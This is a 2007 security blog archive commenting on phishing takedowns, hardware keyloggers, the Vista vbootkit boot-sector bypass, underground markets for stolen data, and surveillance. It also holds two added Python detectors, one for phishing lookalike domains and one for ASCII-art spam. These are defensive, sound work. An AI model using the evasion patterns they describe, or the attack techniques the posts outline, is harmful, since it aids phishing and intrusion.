Friday, March 30, 2007

Cyber Traps for Wannabe Jihadists

I guess that's what happens when you don't have a single clue about where the real conversation and recruitment are happening, so you decide to create your own controlled jihadi communities to monitor. A case study in a false sense of effectiveness, from Australia :

"FEDERAL police are setting up bogus jihadist websites to track extremists who use cyberspace to recruit followers and plan attacks. The undercover operation, disclosed yesterday by Australian Federal Police Commissioner Mick Keelty, is an assault on arguably the most powerful weapon of the global jihadist movement, the internet. Mr Keelty said police were working closely with foreign governments and the military's Defence Signals Directorate. "We have worked with some foreign countries through our undercover program, establishing our own websites, to capture some of the activities that are going on on the internet," he told a security conference in Sydney."

"Some of the activities" will have absolutely nothing to do with the real situation, and even if someone bothers to open up a discussion on your second-hand jihadi site, it'll be a classic example of a moron. Fighting for a share of the online jihadi traffic is so unpragmatic, unnecessary, time- and resource-consuming that you'd better rethink the entire idea, emphasize intelligence data sharing with other countries in case you cannot monitor the emergence of local communications, and keep an eye on them.

Meanwhile, the talk on the street is heating up :
- Hello underaged kids, I see you're having trouble getting hold of some quality Russian vodka over here in front of that store, I can probably give you a hand with this?
- Yes, please, please!!!
- Aha! Agent Temptation from the Thought Police here, you're busted for desiring to drink alcohol even without drinking it! Put your tongues on your head so I can see them!

In the long term we may actually have a real-life bomber confessing to visiting an online jihad community before the plot took place, one that, oops, happens to be one of the fake ones. Now we have a double oops. Many other related posts provide an overview of the big picture and of the countless budget allocation myopia failures that emphasize technological approaches to detecting radical jihadi propaganda, whereas cyber jihadists and future terrorists are getting efficient at generating "noise sites", the ones your crawlers are so good at picking up.

IMSafer Now MySpace Compatible

MySpace, the world's most popular social networking site and an online predator's dream come true, has been actively discussed since the very beginning with respect to the measures News Corp's property takes to prevent child abuse through the site. Let's face the facts: of course underaged kids will confirm they're over 18/21 in order to use the site, and of course online predators will continue finding ways to socially engineer an online contact with the ultimate idea of meeting in the physical world. Why? Because children provide way too much sensitive information in order to socialize virtually and meet new buddies, thus indirectly helping pedophiles pinpoint key "contact points" in the future. If you as a parent start getting paranoid, you'll end up with the wrong conclusion that the risks are not worth the benefits, totally forgetting that forbidden fruits taste much better and that it's children we're talking about -- they break the established rules on principle. No matter the registration procedures in place, you cannot stop an online predator from registering and communicating with children at the site; what you can do, however, is educate your children and emphasize filtering rather than spying in order to protect them.

The team behind IMSafer, a service which I covered in a previous post, have realized the potential benefits of introducing MySpace compatibility, and so it recently became a reality :

"IMSafer's updated language-analysis engine can scan individual MySpace postings for potentially dangerous, threatening or sexually explicit content, the company said. Users can download the tool from the company's Web site, said Brandon Watson, CEO and founder of the company. Traditional parental control software generally can filter and block Web sites but can't identify possible dangerous interactions on increasingly popular social networking sites such as MySpace, he said. While most sexual solicitations of children still come through instant messaging software, online predators are increasingly using MySpace to initiate contact with potential victims, Watson added."

Don't forget the bottom line: if you're in a fragile relationship with your kids, pretty much anyone online could take advantage of their vulnerable condition. The irony is that people you've never met will show more respect to you than the people you actually fight to get respect from. From a child's perspective, that's you, parents! Here are several more articles worth going through, especially this post-event response to what is, to me, an internal problem.

Wednesday, March 28, 2007

Real Time Spam Shredding

Wednesday's portion of hahaha-ing. This is the work of a pragmatic genius, the revenge of the nerds, or call it whatever you want; the idea is simple - what gets detected as spam gets printed and shredded in real time, for interactivity. How much would it cost for a Fortune 500 organization to implement such a feature? A "fortune" by itself for sure, but an anti-spam vendor looking to differentiate its headquarters might be interested in implementing such a system for their corporate clients to see while walking around.

"Spamtrap" is an interactive installation piece that prints, shreds and blacklists spam email. It interacts with spammers by monitoring several email addresses I have created specifically to lure in spam. I do not use these email addresses for any other communication. I post individual email addresses on websites and online bulletin boards that cause them to be harvested by spambots and then to start receiving spam. Because I know that all email sent to these email addresses is spam, I have set the installation to print and then shred each email as it arrives."

Read more about the Spamtrap in this blog. There's simply so much spam these days, you can even create large data sets in order to render surrealistic spam art paintings, no kidding.

Tuesday, March 27, 2007

You've Got Something in Your Eye

Or that's what the ever-growing Big Brother says :

"Avigilon's 16 megapixel cameras are the first surveillance cameras that can continuously monitor large fields of view while maintaining high levels of detail. In the past, security professionals have had to rely on opto-mechanical PTZ cameras for wide field of view surveillance and were forced to make a tradeoff between field of view and image detail. Avigilon's 16 megapixel cameras provide a superior solution for post incident investigation because they provide detailed images of the entire field of view, without the requirement of an operator to control the camera."

I like how the press release debunks the idea of real-time incident prevention through CCTV surveillance, compared with post-incident investigation and the analysis of past events. Not that it's not possible, but the investment isn't worth the return, and if self-regulation is the single most visible return on investment here, that's a bad deal. But in reality, keep on living in a CCTV myopia world, where the "blind spot" of one camera gets covered by installing another one, and the "blind spot" of the second one gets covered by a third. It's about time your CCTV expenditures started declining, provided reasonable metrics defining a successful investment appear soon.

Now let's hope these cameras never get installed in public restrooms, shall we?

Ghosts in the Keyboard

KeyGhost is a nasty type of hardware keylogger that, if ignored as a concept, can truly expose a lot of data, with one downside - the logged data has to be retrieved physically, in the very same fashion the keylogger got installed. Here's how the six-year-olds do it :

"A six-year-old girl has successfully hacked into the UK Parliament's computer system, installing a keylogger onto an MP's machine. Guildford MP Anne Milton agreed to leave her computer unattended for 60 seconds as part of a test of House of Commons IT security by the BBC's Inside Out programme. Brianagh, a schoolgirl from Winchester, took just a quarter of that time to install the keylogging software without being noticed. Such easily available applications record all the keystrokes made on a machine and can therefore be used to steal passwords, financial data and personal information."

The article starts by mentioning the software and ends up with a quote on the "device" itself. The story is a great wake-up call, especially the six-year-old girl part, as it will position the computer system's security as extremely weak in the minds of the masses, no wait, the taxpayers. But age doesn't really matter here; it's the assumption that the majority of insecurities follow an outside-in trend, namely that they come from the Internet and not from within, as we see in this case. In case you're interested, there are already various business development activities around releasing a laptop-based PCI card keylogger, given the obvious incompatibilities with a PC.

Related posts:
USB Surveillance Sticks
Espionage Ghost Busters

Thursday, March 22, 2007

Take this Malicious Site Down - Processing Order..

Yet another pay-pal-secure-login.tld domain gets registered, and even more ironically, in its directory listings you'll be able to dig out the login pages of several other financial institutions and online companies, even competitors. Financial institutions cannot cope with the volume of such registered domains, and some -- even after being reported to the usual abuse account -- remain active for weeks. So how do you protect these businesses, and cash in for doing so? Looks like RSA is diversifying its service from phishing hosting sites to malware hosting ones :

"EMC's RSA division plans to launch a new service next month that will help financial institutions take down Web sites associated with malicious Trojan Horse software. The service is planned as an extension to the FraudAction phishing takedown service already offered by RSA, said Louie Gasparini, co-chief technical officer with RSA's Consumer Solutions unit. "We're leveraging the same infrastructure we already have in place... and now we're focusing our attention on how Trojans work," he said. Gasparini said he expects financial services companies, auction sites, and online merchants to use the service. "It's really allowing the institution to better protect its customers," he said."

Can RSA really cash in by re-intermediating the current communication model, and most importantly, do a better job? It can surely allow the targeted companies to focus on innovation and growth rather than on online impersonation attacks, so I find this a sound product line extension, but I'd need more performance stats to offer valuable recommendations.

According to the latest Anti-Phishing.org report, the threat landscape looks very favorable when it comes to communicating with the main country hosting phishing sites - the U.S., followed by China and South Korea. In between companies diversifying their portfolios of services and products, there's one other thing to keep in mind, and that's how you can achieve the same results in a more cost-effective way than the commercial propositions. And can you actually? Do you even have to dedicate financial resources to shutting down these sites, compared to educating your customers on how to use their brains? Ask yourself these questions before losing it in a budget allocation myopia. Something else to keep in mind - ISPs will also start getting interested in the idea of an equal distribution of revenues, given the sound business model.
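The pay-pal-secure-login.tld pattern mentioned above is easy to triage mechanically before a takedown request is ever written. The following is an added example for this post, not code from the blog, from RSA's FraudAction service or from any registrar: it scores a constructed feed of newly registered domain names against a list of protected brands, undoing the usual digit-for-letter substitutions and allowing one typo, and weights the hit by the "secure"/"login"-style lure words and heavy hyphenation the post describes. The brand list, the lure-token list, the sample feed and the score thresholds are all assumptions chosen for illustration.

```python
"""Brand-impersonation triage over a feed of newly registered domain names.

Added example for this post; it is not code from the blog, from RSA's
FraudAction service or from any registrar. The brand list, the lure-token
list, the sample feed and the score thresholds are all constructed
assumptions chosen for illustration.
"""
import re
from typing import Dict, List, Tuple

# Assumption: the brands whose customers you are protecting.
PROTECTED_BRANDS: List[str] = ["paypal", "ebay", "citibank"]

# Words that typically accompany a credential-phishing registration
# (the post's own example is pay-pal-secure-login.tld).
LURE_TOKENS = {"secure", "login", "signin", "verify", "update", "account", "confirm"}

# Digit/symbol substitutions commonly used to slip past a naive substring match.
LEET_MAP = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a",
                          "5": "s", "7": "t", "@": "a", "$": "s"})


def normalize_label(domain: str) -> str:
    """Lower-case the left-most label, undo leet substitutions, drop non-letters.

    Assumes the feed carries registrable domains (brand-login.example), not hostnames.
    'pay-pal-secure-login.example' -> 'paypalsecurelogin'
    """
    label = domain.lower().split(".")[0]
    label = label.translate(LEET_MAP)
    return re.sub(r"[^a-z]", "", label)


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance; one edit catches squats such as 'paypall' or 'cltibank'."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def brand_matches(norm_label: str, brands: List[str]) -> List[Tuple[str, str]]:
    """Return (brand, how) pairs: exact substring, or a one-edit window match."""
    hits = []
    for brand in brands:
        if brand in norm_label:
            hits.append((brand, "contains"))
            continue
        if len(brand) < 5:            # short brands give too many one-edit false positives
            continue
        span = len(brand)
        windows = [norm_label[i:i + span] for i in range(max(1, len(norm_label) - span + 1))]
        if min(levenshtein(w, brand) for w in windows) <= 1:
            hits.append((brand, "near-miss"))
    return hits


def assess_domain(domain: str, brands: List[str] = PROTECTED_BRANDS) -> Dict[str, object]:
    """Score one registration; 'suspect' warrants analyst review and a takedown request."""
    label = domain.lower().split(".")[0]
    hits = brand_matches(normalize_label(domain), brands)
    lures = sorted(LURE_TOKENS & set(label.split("-")))
    score = 0
    if hits:
        score += 2                         # a protected brand is present or one typo away
        score += min(len(lures), 2)        # each lure word adds weight, capped at two
        if label.count("-") >= 2:          # heavily hyphenated labels are a phishing hallmark
            score += 1
    verdict = "suspect" if score >= 3 else ("review" if hits else "ok")
    return {"verdict": verdict, "score": score, "brands": hits, "lures": lures}


def triage(feed: List[str]) -> Dict[str, Dict[str, object]]:
    """Assess every domain in a feed and key the results by domain."""
    return {d: assess_domain(d) for d in feed}


# Constructed sample feed, a stand-in for a daily newly-registered-domains list.
SAMPLE_FEED = [
    "pay-pal-secure-login.example",      # the post's pattern: brand split by hyphens plus lure words
    "paypa1-verify.example",             # digit substitution, undone by LEET_MAP
    "c1tibank-account-update.example",   # '1' maps to 'l', so only the one-edit window catches it
    "paypalfans.example",                # brand present, no lure words: worth a look, not an alarm
    "weather-login.example",             # lure word alone, no brand: not flagged
]

if __name__ == "__main__":
    for domain, result in triage(SAMPLE_FEED).items():
        print(f"{domain:35} {result['verdict']:8} score={result['score']} "
              f"brands={result['brands']} lures={result['lures']}")
```

A lure word on its own ("weather-login") never raises an alarm, and a brand name without any lure context only lands in the "review" bucket; the near-miss window is what catches "c1tibank", because the leet map resolves "1" to "l" rather than "i" and a substring match alone would miss it.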

Related posts:
The Phishing Ecosystem
Anti-phishing Toolbars - Can You Trust Them?
Google's Anti-phishing Black and White Lists

Tricking an UAV's Thermal Imagery

Give me a hug so that we become "thermally one" for the thermal paparazzi to see. When you know how something works, you can either improve, abuse or destroy it. A very interesting abuse of technology by people who know how it works :

"The Marines cuffed Awad and took him to a nearby bomb crater. At this point the drone approached for its first pass overhead. One of the group moved forward and dug a hole at the crater, while the others posed with Awad behind a wall. The recorded thermal imagery from the aircraft seemed to show troops watching an insurgent digging by the road, perhaps to place a bomb. After the drone had passed, the group moved Awad forward to the hole. But at this point the surveillance platform returned, so one of the Marines wrapped himself around Awad so as to create a single thermal signature, disguising the captive's presence."

If you're under thermal surveillance a cold shower's your invisibility coat if one's available. Wired has some photos on this story.

Wednesday, March 21, 2007

Zoom Zoom Zoom - Boom!

If only you could eradicate the radicalization of immature Islamic youth over the Internet with the push of a button. Great surgical shot!

A Documentary on CCTVs in the U.K

Every breath you take, every move you make, I'll be watching you. It used to be a great song, but it has a disturbing context these days. Nino Leitner's EveryStepYouTake documentary on the state of surveillance in the U.K. will premiere this month, and I suspect the full version will be made available for the world to see too :

"Trying to answer questions like these, Nino Leitner’s one-hour documentary “EVERY STEP YOU TAKE” digs deep into an entirely British phenomenon: nation-wide video surveillance. It features formal interviews with the surveillance researcher Professor Clive Norris, Deputy Chief Constable Andy Trotter from the British Transport Police, a representative of Britain’s largest civil rights group Liberty, a CCTV manager from a public local CCTV scheme, experts in the field of transport policing and many more. The surveillance reality in Britain is compared with another member of the E.U., Austria. Compared to the UK, it can be seen as a developing country in terms of CCTV, but just as elsewhere all over the world, politicians are eager to extend the surveillance gaze."

Here's an animation to help you explain what surveillance means to your cat, another one fully loaded with attitude, and let's not exclude the big picture.

Related posts:
London's Police Experimenting with Head-Mounted Surveillance Cameras
Head Mounted Surveillance System
Eyes in London's Sky - Surveillance Poster

Unsigned Code Execution in Windows Vista

Nitin Kumar and Vipin Kumar are about to present the Vbootkit at the upcoming Blackhat and HITB cons :

"We have been recently researching on Vista. Meanwhile, our research for fun lead us to some important findings. Vista is still vulnerable to unsigned code execution. vbootkit is the name we have chosen (V stands for Vista and boot kit is just a term coined which is a kit which lets you doctor the boot process). The vbootkit concept presents how to insert arbitrary code into RC1 and RC2, thus effectively bypassing the famous Vista policy for allowing only digitally signed code to be loaded into the kernel. The presented attack works using custom boot sectors. Custom boot sectors are modified boot sectors which hook the booting process of the system & thus gain control of the system. Meanwhile, the OS continues to boot and goes on with normal execution."

Vulnerabilities are an inevitable commodity; they will always appear, and instead of counting them per OS or per piece of software, consider a vendor's response time while following the life of the security threat. I never actually liked the idea of an insecure OS; to me there are well-configured and badly-configured OSs with respect to security, but then again, if you're a monocultural target the way Microsoft is, you'll always be in the zero day spotlight. A security breach will sooner or later hit your organization, so don't talk, act, and don't pretend you're 100% secure, because you cannot be. Instead, proactive measures balanced with contingency planning to minimize the impact should get a high priority in your strategy. Here's a related post.

Cartoon courtesy of Userfriendly.org

Tuesday, March 20, 2007

A Fortune 500 Blogosphere? Not Yet

Enterprise 2.0 is slowly gaining ground and you cannot deny it, despite top management's neutral position on yet another major "Reengineering of the Corporation". Supply chain management was perhaps among the first departments to really utilize the power of real-time information and interoperable data standards -- a mashup-ed ecosystem -- but improving your employees' productivity through Web 2.0 tools such as intranet blogs and wikis remains just as unpopular as actual Fortune 500 companies blogging. But how come? Lack of evangelists? Not at all. There's one minor obstacle: you cannot teach an old dog new tricks, unless of course you dedicate extra investment to training him, which is exactly what I feel is happening at the corporate stage - everyone's patiently waiting for the concepts to mature before training and implementation happen for real. What's the current attitude towards external Web 2.0 activities? A Fortune 500 blogosphere isn't emerging as fast as the mainstream one is, according to the Fortune 500 Business Blogging Wiki :

"a directory of Fortune 500 companies that have business blogs, defined as: active public blogs by company employees about the company and/or its products. According to our research, 40 (8%) of the Fortune 500 are blogging as of 10/05/06. The navigation sidebar to the right lists all the Fortune 500 companies. The list below are the ones that we've found so far that have public blogs as defined above. Please help us by entering data on those we've missed. ONLY Fortune 500 companies, please. If you're not sure if it's on the F500 list (it includes US companies only), check the sidebar. If it's not there, consider adding it to the Global 1,000 Business Blogging page instead."

I think the main reason behind this is the inevitable channel conflicts that will arise from, let's say, Pfizer blogging, compared to using the services of their traditional advertising and PR agencies -- I also imagine a link density analysis of their blog indicating the highest percentage of links pointing to Erowid.org. But ask yourself the following: what if these very same agencies start offering bloggers-for-hire in their portfolio of services, would the big guys get interested then? Or when will they start understanding the ROI of blogging?

Video on Analyzing and Removing Rootkits

Courtesy of WatchGuard, part three of their malware analysis series walks you through various commercial and free utilities for detecting and removing rootkits :

"In this episode, Corey and his Magic White Board show how kernel mode rootkits work. Also covered: recommended tools and techniques for detecting and removing rootkits."

Jihadists Using Kaspersky Anti Virus

I wonder what the lowlifes are actually protecting themselves from: malware attacks in general, or a malware infection courtesy of an unnamed law enforcement agency, given their interest in coding malware :

"German police officials have expressed interest in developing software tools to help them surveil computer users who may be involved in crime. The tools might include types of software similar to those used in online fraud and theft schemes, such as programs that record keystrokes, logins and passwords. Security companies, however, are asserting that they wouldn't make exceptions to their software to accommodate, for example, Trojan horse programs planted by law enforcement on users' computers."

This is a very contradictory development that deserves to be much more actively debated around the industry than it is for the time being. Law enforcement and intelligence agencies have always been interested in zero day vulnerabilities and firmware infections, thus gaining a competitive advantage in the silent war. Among the most famous speculations about an intelligence agency using malicious code for offensive purposes is the infamous CIA logic bomb infection of a Russian gas pipeline :

"While there were no physical casualties from the pipeline explosion, there was significant damage to the Soviet economy. Its ultimate bankruptcy, not a bloody battle or nuclear exchange, is what brought the Cold War to an end. In time the Soviets came to understand that they had been stealing bogus technology, but now what were they to do? By implication, every cell of the Soviet leviathan might be infected. They had no way of knowing which equipment was sound, which was bogus. All was suspect, which was the intended endgame for the operation. The faulty software was slipped to the Russians after an agent recruited by the French and dubbed "Farewell" provided a shopping list of Soviet priorities, which focused on stealing Western technology."

Excluding the spy thriller motives, nothing's impossible, the impossible just takes a little while, and the same goes for SCADA device vulnerabilities and purposely shipping buggy software. Anti-virus vendors will come under even more pressure trying to protect their customers not only from the malware released by malware authors, but also from that courtesy of law enforcement agencies. Cyber warfare is here to stay, no doubt about it, but using malware to monitor suspects will perhaps prompt them to keep an eye on the last time their AV software got updated, and to keep pushing the update button in between.

ASCII Art Spam

A spammer's biggest trade-off - making it through anti-spam filters doesn't mean the email recipient will get even the slightest chance of understanding what he's about to get scammed with.

"We have seen SPAM using ASCII ART in order to avoid being detected by antispam filters. Most of the times, they try to show different words (Viagra, etc.) using this technique, but this is the first time I have seen them showing a picture. It is not a very high quality one, but I’ve tried it with some different antispam filters and they have been fooled."

Here's an old school ASCII generator you can play around with, and a related image from a previous post on overperforming spammers.
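Because ASCII art carries its message in the shape of the text rather than in its words, a keyword-based filter has nothing to match on; what it can match on instead is the shape itself. The following heuristic is an added example for this post, not code from the blog or from any anti-spam product: it measures how "drawn" a message body is (the share of lines and of visible characters that are neither letters nor digits, plus runs of one repeated character) and flags bodies above a threshold. The three message bodies are constructed, and the thresholds are assumptions that a real deployment would tune on its own mail corpus.

```python
"""Heuristic detection of ASCII-art e-mail bodies.

Added example for this post; not code from the blog or from any anti-spam
product. The three message bodies are constructed, and the thresholds in
looks_like_ascii_art are assumptions that a real deployment would tune on
its own mail corpus.
"""
import re
from typing import Dict

_RUN_RE = re.compile(r"(\S)\1{3,}")   # four or more identical visible characters in a row


def ascii_art_features(body: str) -> Dict[str, float]:
    """Per-message features describing how 'drawn' the text is rather than written.

    A line counts as a symbol line when at least 60% of its visible characters
    are neither letters nor digits. A run line repeats one character four+ times.
    """
    lines = [ln for ln in body.splitlines() if ln.strip()]
    if not lines:
        return {"lines": 0, "symbol_line_ratio": 0.0, "run_line_ratio": 0.0, "symbol_char_ratio": 0.0}
    symbol_lines = run_lines = visible_chars = symbol_chars = 0
    for ln in lines:
        visible = [ch for ch in ln if not ch.isspace()]        # never empty: blank lines were dropped
        symbols = sum(1 for ch in visible if not ch.isalnum())
        visible_chars += len(visible)
        symbol_chars += symbols
        if symbols / len(visible) >= 0.6:
            symbol_lines += 1
        if _RUN_RE.search(ln):
            run_lines += 1
    return {
        "lines": len(lines),
        "symbol_line_ratio": symbol_lines / len(lines),
        "run_line_ratio": run_lines / len(lines),
        "symbol_char_ratio": symbol_chars / visible_chars,
    }


def looks_like_ascii_art(body: str, min_lines: int = 4,
                         line_ratio: float = 0.5, char_ratio: float = 0.4) -> bool:
    """True when enough of the body consists of symbol-heavy lines or symbol characters."""
    f = ascii_art_features(body)
    return f["lines"] >= min_lines and (
        f["symbol_line_ratio"] >= line_ratio or f["symbol_char_ratio"] >= char_ratio
    )


# Constructed sample 1: a word drawn in ASCII art with decorative filler, no readable text.
ART_SPAM = r"""
 _   _   ___   ___
| | | | / _ \ / _ \
| |_| || | | || | | |
 \___/ \___/ \___/
$$$$$$$$  ****  ####
"""

# Constructed sample 2: ordinary business mail.
HAM = """
Hi team,

The quarterly report is attached. Please review sections 2-4 before
Friday's meeting and send comments to me directly.

Thanks,
Dana
"""

# Constructed sample 3: a plain-text table, the classic false positive for this heuristic.
TABLE = """
+--------+-------+
| item   | qty   |
+--------+-------+
| bolts  | 40    |
+--------+-------+
"""

if __name__ == "__main__":
    for name, body in (("art spam", ART_SPAM), ("ham", HAM), ("table", TABLE)):
        print(f"{name:9} flagged={looks_like_ascii_art(body)} {ascii_art_features(body)}")
```

The table sample is flagged on purpose: border rows are symbol lines, so a text table or a decorative signature block scores the same way a drawn Viagra logo does. That is why the result belongs in a scoring pipeline as one signal alongside sender reputation and content checks, not as a stand-alone verdict.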

Monday, March 19, 2007

The Underground Economy's Supply of Goods

Symantec (SYMC) just released their latest Internet Security Threat Report, 104 pages of graph-rich observations based on the data streaming from their sensor network :

"Volume XI includes a new category: “Underground Economy Servers”. These are used by criminals and criminal organizations to sell stolen information, including government-issued identity numbers, credit cards, bank cards and personal identification numbers (PINs), user accounts, and email address lists. To reduce facilitating identity theft, organizations should take steps to protect data stored on or transmitted over their computers. It is critical to develop and implement encryption to ensure that any sensitive data is protected from unauthorized access."

In between their coverage of various segments such as vulnerabilities, phishing, spam and, yes, malware (despite my doubts about SMTP being the major propagation vector on a worldwide scale), I came across a nice figure summarizing their encounters while browsing various forums and web sites.

The question is - why are these underground goods cheaper than a Kids' menu at McDonald's, as I once pointed out in O'Reilly Radar's post on spamonomics? Because in 2007 we can easily speak of "malicious economies of scale", thus profit margin gains, despite the ongoing zero day vulnerabilities cash bubble at certain forums, don't seem to be that important. So can we conclude that greed isn't the ultimate driving force, but rather getting rid of the stolen information in the fastest way possible, taking into consideration that its exclusiveness disappears with each and every minute? The principle goes that a dollar earned today is worth more than a dollar earned tomorrow, but how come? Simple: by tomorrow the exclusiveness of your goods might be just gone, because the affected parties detected the leaks and took action to prevent the damage.

Issues to keep in mind regarding the graph:
- Harvested spam databases have been circulating around for years and so have turned into a commodity; for instance, I often come across geographically segmented databases or per-email-provider segmented ones, not for sale, but for free. So how come the "good" is offered for free? It's obviously fine for the "good" to be offered for free when there's a charge for the service: the service of verifying the validity of the emails, the service of encoding the message in a way that bypasses anti-spam filters, and the service of actually sending the messages.
- Where's the deal for a malicious party when selling an online banking account with a $9,900 balance for just $300? For me, it's a simple process of risk-forwarding to a party that is actually capable of getting hold of the cash.
- Yahoo and Hotmail email cookies per piece? Next it will be an infected party's clickstream for sale, and you'll have the malicious parties competing with major ISPs, who are obviously selling yours for the time being.
- Compromised computers per piece? Not exactly. Entire botnets, or the utilization of the possible services offered on demand, for a price that's slightly higher than the one pointed out here.

Psychological imagination is just as important as playing devil's advocate when coming up with scenario-building tactics to protect your customers and yourself from tomorrow's threats.

Related images:
- surveying potential buyers of zero day vulnerabilities in order to apply marginal thinking in their proposition
- advertisement for selling zero day vulnerabilities
- listing of available exploits
- zero day vulnerabilities shop, I'm certain it's a PHP module that's currently hosted somewhere else
- the WebAttacker toolkit
- The RootLauncher
- The Nuclear Grabber and geolocated infections -- site disappeared already

Subconscious Search Monopoly Sentiments

And hey, that's from someone attending the Microsoft MVP Summit for the N-th time :

"I was invited to attend the Microsoft MVP Summit last week. If you want to know what the Summit is about or what a MS MVP is, Google is your friend."

Microsoft's MVP is a great corporate citizenship tool, where empowering and crediting the individual on a wide scale, rather than internal reputation benchmarking, is an indirect use of the "act as an owner" management tactic -- implement it. Supporting existing standards -- look up interoperability -- benefits us all; reinventing the wheel without a unique vision, beyond ever-increasing (projected) profit margins, wouldn't even benefit the company in the long term.

If you truly want to disrupt, disrupt by first (legally) taking advantage of someone else's already developed foundations to do so; the rest is attitude and hard-to-imitate competitive advantages. Good brainstorming questions in Anil's post nonetheless.

Spam Comments Attack on TechCrunch Continuing

In a previous post I commented on O'Reilly.com's war on spam according to their statistics, and I thought you might find the blog spam stats TechCrunch has just provided informative as well :

"On January 4 we reported that the Akismet filter had stopped a million spam comments from reaching TechCrunch. At that point we’d been using it for about nine months. The number of blocked spam comments is now two million, just ten weeks later. That works out to about 15,000 spam comments hitting TechCrunch every day. If we did not have Akismet, we couldn’t allow anonymous commenting here on TechCrunch. We used to go through all spam comments to pick out the occasional false positive and accept it. Now, there are just too many to go through. All comments marked by Akismet as spam get deleted almost immediately."

I turned blog comments off quite a while ago and, to be honest, the best comments, recommendations and tips, as well as the people I've met through this blog, came over email and backlinks. Keep 'em coming! Moreover, it's not just the inability of service providers to keep up with the aggressive generation of splogs; malicious parties are already exploiting some of the fancy features that make blogs so flexible when it comes to personalization and social networking. Next time, Fortinet will come up with another advisory, this time discussing MySpace, so consider it a cyclical shift from one provider to another depending on the current defenses in place -- blackhat SEO.

Personal Data Security Breaches Spreadsheet

Some stats try to emphasize the number of people affected while forgetting the key points I outlined in a previous post on why we cannot measure the real cost of cybercrime, and yes, the duplicates among the affected people in any of the available statistics. The number of people affected will continue to rise, but that's not important; what's important is to identify the weakest link in this process, and for the time being, you're a "data hostage" in order to enjoy your modern lifestyle -- ever asked yourself what's going to happen to your digital data after you're gone?

Spreadsheet nerds, here's something worth taking the time to play around with; most importantly, this huge dataset debunks the common myth of hackers taking the credit for the majority of personal data security breaches, whereas, as you can see in the figures, on the majority of occasions -- and it's an ongoing trend -- companies themselves should be in the spotlight :

"On average, in 2005 personal records were compromised at a rate of 5.2 million a month. On average, in 2005 personal records were compromised at a rate of 5.8 million a month. Assuming a similar rate of growth, by November or December this year we should cross the 2.0 billion mark. This is a conservative estimate because many of the news stories we archived were conservative on their own estimates of how many records were lost in particular incidents, and because a small number of incidents are reported without details of how many personal records were compromised.

View figures and tables of this paper as a *.pdf. View pre-publication draft of paper as a *.pdf. View dataset of incidents as a *.xls. View University of Washington Press office news release on this research."

Graphic presenting the risk of identity theft in the U.S. only, based on the severity of data breaches, courtesy of Danny Dougherty.

Complexity and Threats Mind Mapping

The folks at Security-Database.com -- who, by the way, expressed their excitement over my blog -- just released an outstanding mind map of the most common Firefox security extensions used for various purposes, starting from information gathering and going up to data tampering :

"FireCAT is based upon a paper we wrote some weeks before (Turning firefox to an ethical hacking platform) and downloaded more than 25 000 times. We also thank all folks that encouraged us and sent their suggestions and ideas to make this project a reality. This initial release is presented as a mindmap and we are open to all your suggestions to make it a really good framework for all the community of security auditors and ethical hackers. We will make a special page for this framework soon to let you monitor this activity."

Great idea; it reminds me of Ollie Whitehouse's excellent mind map of mobile device threats. The semantics of security, when applied in a visualized manner, have the potential to limit the "yet another malware variant in the wild" type of news article, or hopefully help the mainstream media break out of the "echo chamber" and re-publishing myopia, thus covering the basics.

Anyway, which is the most useful tool you'll ever encounter? It's called experience. Which is the most important threat to keep an eye on? It's not knowing what's going on at a particular moment: a lack of situational awareness.

Wednesday, March 14, 2007

Threats of Using Outsourced Software - Part Two

Continuing the coverage of the U.S government's overall paranoia about using outsourced software on DoD computers, and even hardware -- firmware infections are still in a spy's arsenal only -- in a recent move by the Defense CIO's office a tiger team has been officially assigned to audit the software and look for potential backdoors :

"The Pentagon is fielding a task force charged with testing software developed overseas, according to a Defense Department official. The “tiger team,” organized within the Defense CIO’s office, is ready to move to the implementation stage, said Kristen Baldwin, deputy director for software engineering and systems assurance in the Office of the Undersecretary of Defense for Acquisition, Technology, and Logistics. Baldwin spoke yesterday at the DHS-DOD Software Assurance Forum in Fairfax, Va. “Tiger team” is a software-industry term for a group that conducts penetration testing to assess software security. “Success means they understand where their focus needs to be and how to prioritize their efforts,” Baldwin said. “They understand the supply-chain impact on systems engineering, and are ready to move forward in an effort to mitigate assurance risk.”"

There's another perspective you should keep in mind. Looking for backdoors is shortsighted, as the software may come vulnerabilities-ready, so prioritizing whether to look for vulnerabilities or for actual backdoors will prove tricky. The use of automated source code auditing may prove valuable as well, but taking the big picture into consideration, if you were to track the vulnerabilities that could act as backdoors in U.S coded software -- taking Windows for instance -- compared to those in foreign software, you'll end up with rather predictable results.

The bottom line: does shipping insecure software have to do with source code vulnerabilities, or should the threat be perceived in relation to backdoor-shipped software? The true ghost in the shell, however, remains the yet undiscovered vulnerabilities in the software acting as vectors for installing backdoors, not the software itself shipped backdoor-ready. Meanwhile, are stories like these a violation of OPSEC by themselves? I think they are.

Monday, March 12, 2007

Timeline of Iran's Nuclear Program

Iran's a rising star these days. It's not just that the country recently launched its first missile into space despite efforts of the international community to ban its nuclear program, got caught obtaining sensitive military technology, and is currently helping the enemies (Hezbollah) of its enemies (the U.S), but also that it has Russia enriching its uranium in between legally supplying it with technology and upgrade parts the U.S put an embargo on -- business as usual. Here's a very in-depth and informative timeline of Iran's entire nuclear program saga :

"The Bush Administration has almost certainly not approved the timing of military operations against Iran, and consequently any projection of the probable timing of such operations is necessarily speculative. The election of Mahmoud Ahmadi-Nejad as Iran's new president would appear to preclude a negotiated resolution of Iran's nuclear program. The success of strikes against Iran's WMD facilities requires both tactical and strategic surprise, so there will not be the sort of public rhetorical buildup in the weeks preceding hostilities, of the sort that preceded the invasion of Iraq. To the contrary, the Bush Administration will do everything within its power to deceive Iran's leaders into believing that military action is not imminent."

Here's another timeline, this time of U.S-Iran contracts from 1979 until today.

Google Maps and Privacy

I thought I'd seen the best close-ups from Google Maps in the top 10 naked people on Google Earth, but this screenshot is spooky, as the guy is even looking straight into the sky, which makes it an even more interesting catch. It proves one thing: Google are capable of providing high-res satellite imagery, which they aren't on a mass scale for the time being. Shall we speculate on the possible reasons why this guy is looking up, a remotely controlled aerial surveillance device perhaps, but what's the relation with Google Maps whatsoever? More at Google Blogoscoped, as well as in previous posts related to the topic.

Touching the Future of Productivity

